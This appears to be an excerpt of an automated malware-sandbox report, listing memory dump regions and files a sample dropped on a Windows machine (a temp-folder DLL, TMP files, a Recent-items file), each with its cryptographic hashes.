SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

memory/4836-51-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\kznoktjg\CSCED97D26999C74B27BCE341846D169867.TMP

MD5 e599d4a7c56d2526fe04f64d6dacc3a5
SHA1 1311032a7f9d919c7c1f30849f6c21402b7c7e1a
SHA256 7dd88f1887104016beaa0b0b5eb9b38e337ccf96c2f62daf92ba68f815a9e4de
SHA512 9148c4be02ba2bb54e14a5d4e9ee30a5646ebb2e13a39f02a9149671959ec2880153adec9994829c3345777f43931c9ee18969d47ece56c23e8ffde846a65ff0

C:\Users\Admin\AppData\Local\Temp\RESC1AA.tmp

MD5 fb49e17676efdf0ea4bedff3608c149a
SHA1 9d850b836244ea7098e943c97464c275a928f003
SHA256 34f1a0c53420e2aae548f5318f7d5e5990795ed4ca7ed7e3ff25d52cf9b4d540
SHA512 6ce76206fb11902cc5fa528bf898004b1207fb284cdea8117f8a002ba5378b41d83ea7891a09f403de7420ac3c0ba7f11f74779c8657ceffd814d1194d150a00

C:\Users\Admin\AppData\Local\Temp\kznoktjg\kznoktjg.dll

MD5 171d62d840c2e770680d13a960bf6435
SHA1 7c57fe0ed2bf6d86617d4877f924d656d4a89d7c
SHA256 36cedcee3076c87a9f0f16aa76c3df265b5d64e44ff4e7919a39ffc4113ffe2c
SHA512 6e0e1a6aa540d8b73e5fd5825cf06be9e111362e78e967217c0934b23391570d64145519da877b767c4b81ea3187997fb7e530e24a86a7ba1e0e2efcd8b07bdc

memory/1760-59-0x0000025BAF0F0000-0x0000025BAF0F8000-memory.dmp

memory/4836-62-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-61-0x00007FFB67C2D000-0x00007FFB67C2E000-memory.dmp

memory/4836-63-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-64-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-65-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-71-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 f31e7cc9cea122ae39e2470da1a56613
SHA1 d6c2af6a1994dbf659e855b84483ff55d50edcfc
SHA256 314a3a67e6b7e324fe70f886f8c4548a72b7cbadbcbe49776dd1c2ef5a377e6f
SHA512 3dd22209610bb3bad8ea8a2c095ba56bd9c3fdbb658ac26764c313bbb0edbfe15e2fc2aa3195a1e75a8119ec13e5bf1b45f88abab2198a15e48e9bbee1fe0e1c